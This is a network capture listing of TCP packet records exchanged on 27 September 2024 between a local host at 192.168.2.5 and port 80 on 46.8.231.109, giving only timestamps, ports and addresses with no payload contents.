Sep 27, 2024 00:15:06.633157015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633174896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633188009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633208036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633220911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633244038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633253098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633289099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633639097 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633671045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633690119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633714914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633728981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633774996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633796930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633830070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633843899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633857012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633862019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633872032 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633887053 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633898020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.633923054 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633944035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.633991957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634006023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634020090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634033918 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634035110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634047985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634061098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634062052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634088993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634104013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634603024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634618044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634632111 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634659052 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634680033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634696960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634711027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634727001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634736061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634742022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634752035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634757042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.634768963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634790897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.634987116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635003090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635023117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635040045 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635065079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635078907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635092974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635107994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635122061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635127068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635137081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635143042 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635173082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635270119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635284901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635299921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635313034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635320902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635329008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635343075 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635353088 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635375023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.635977030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.635989904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636010885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636025906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636034012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636039972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636045933 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636054993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636069059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636070013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636090040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636105061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636111975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636120081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636138916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636156082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636265993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636280060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636293888 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636307001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636311054 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636322021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636332989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636337042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636353970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636363983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636377096 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636400938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636449099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636464119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636476994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636491060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636517048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636580944 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636595011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636609077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636621952 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636621952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636637926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636645079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636672020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636699915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636713982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636729002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636745930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636776924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636888981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636904001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636919022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636933088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636936903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636948109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636948109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636962891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636972904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.636979103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.636993885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.637001991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.637015104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.637038946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.718720913 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.718756914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.718807936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.718838930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.718872070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.718909025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.718909025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.718909025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.718909025 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.718919992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.718930960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.718970060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.718971014 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719002962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719011068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719036102 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719047070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719068050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719082117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719113111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719116926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719149113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719166040 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719181061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719194889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719224930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719228983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719260931 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719283104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719295025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719305038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719327927 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719340086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719357967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719367027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719407082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719409943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719443083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719460011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719475985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719490051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719504118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719521046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719547033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719551086 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719583035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719599009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719611883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719624996 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719655991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719676971 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719710112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719726086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719741106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719758987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719775915 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719784975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719824076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719825029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719856024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719872952 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719887972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719902039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719921112 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719935894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719953060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.719959021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.719985962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720001936 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720014095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720029116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720046043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720047951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720079899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720088005 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720113039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720113039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720145941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720155954 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720176935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720187902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720211029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720222950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720242977 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720253944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720274925 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720287085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720305920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720318079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720340014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720354080 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720390081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720621109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720652103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720670938 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720684052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720695019 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720725060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720865965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720896959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720913887 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720937967 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.720947027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720978022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.720988989 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721009970 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721019983 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721038103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721050978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721071005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721079111 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721101999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721116066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721133947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721148968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721167088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721180916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721199036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721506119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721558094 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721585989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721633911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721635103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721667051 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721687078 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721708059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721714020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721746922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721759081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721777916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721795082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721822977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721826077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721857071 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721874952 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721889019 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721904993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721916914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721935034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721947908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.721968889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721983910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.721996069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722027063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722038031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722059965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722071886 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722109079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722109079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722152948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722160101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722191095 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722214937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722224951 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722227097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722256899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722268105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722291946 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722292900 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722322941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722332954 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722354889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722363949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722388029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722394943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722421885 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722428083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722449064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.722466946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.722489119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723474026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723522902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723530054 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723556042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723567009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723587990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723606110 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723620892 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723638058 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723653078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723668098 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723701000 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723701954 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723733902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723751068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723766088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723783016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723813057 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723814964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723846912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723860979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723891020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723910093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723923922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.723933935 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723967075 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.723970890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724009037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724023104 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724040031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724061012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724071980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724085093 CEST	49708	80	192.168.2.5	46.8.231.109
